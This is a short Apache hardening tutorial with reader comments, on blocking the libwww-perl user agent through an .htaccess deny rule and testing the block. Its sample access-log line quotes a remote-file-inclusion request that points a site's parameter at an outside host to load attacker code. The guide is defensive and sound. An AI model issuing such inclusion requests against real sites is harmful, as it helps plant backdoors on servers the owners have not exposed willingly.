How to block libwww-perl access in Apache webserver to keep away bots,spammers,crackers?

Updated on September 2, 2017

The world of hackers, crackers, bots and spammers are keep growing and it has become serious threat to many websites. libwww-perl (LWP) is a WWW client/server library for Perl and it can help many hackers, spammers and bots to perform attacks on your site. For e.g; Just head on to your web server access log and run the below command.

$ grep ‘libwww-perl’ access_log

Do you see something similar to the below output?

190.85.10.147 www.domain.com - [21/Aug/2013:21:22:38 +0000] "GET /webdir/yesno.phtml?no_url=http://www.hackersite.com/list1.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"

It means, some hacker is trying to use the security hole and install a backdoor pages. So libwww-perl useragent have to be blocked to prevent any such attacks on your website.

hacker
hacker

How to verify whether libwww-perl useragent is blocked on your server?

Step 1: Download this simple perl script and rename it as ‘test-lwp.pl’.

Step 2: Edit ‘test-lwp.pl’ file and replace http://your-website.com/ with your website name.

Step 3: Give executable permission to the script

chmod +x test-lwp.pl

Step 4 : Run the perl script as below,

./test-lwp.pl

Step 4 should display “Error : 403 Forbidden“. If it does not, then your website might be prone for libwww-perl useragent attack.

How to deny libwww-perl attack using .htaccess?

Using mod_rewrite and .htaccess file, we can block user agent libwww-perl. Edit your .htaccess file and add rule as follows:

SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots

Now execute test-lwp.pl file and you should see “Error : 403 Forbidden”. That’s it!

Was this article helpful?

Related Articles

Comments Leave a Comment

  1. /test-lwp.pl: line 1: imple: command not found
    ./test-lwp.pl: line 2: use: command not found
    ./test-lwp.pl: line 3: =: command not found
    ./test-lwp.pl: line 4: syntax error near unexpected token `(‘
    ./test-lwp.pl: line 4: ` $ua->agent(“$0/0.1 ” . $ua->agent);

    I am getting above error while testing my server is protected from perl script attacks

    1. Hi Anil, do you have Perl installed? What does which perl command say?

  2. Thanks peter, its really a required info for all the webmasters….. will be looking more such tips on security.

Leave a Comment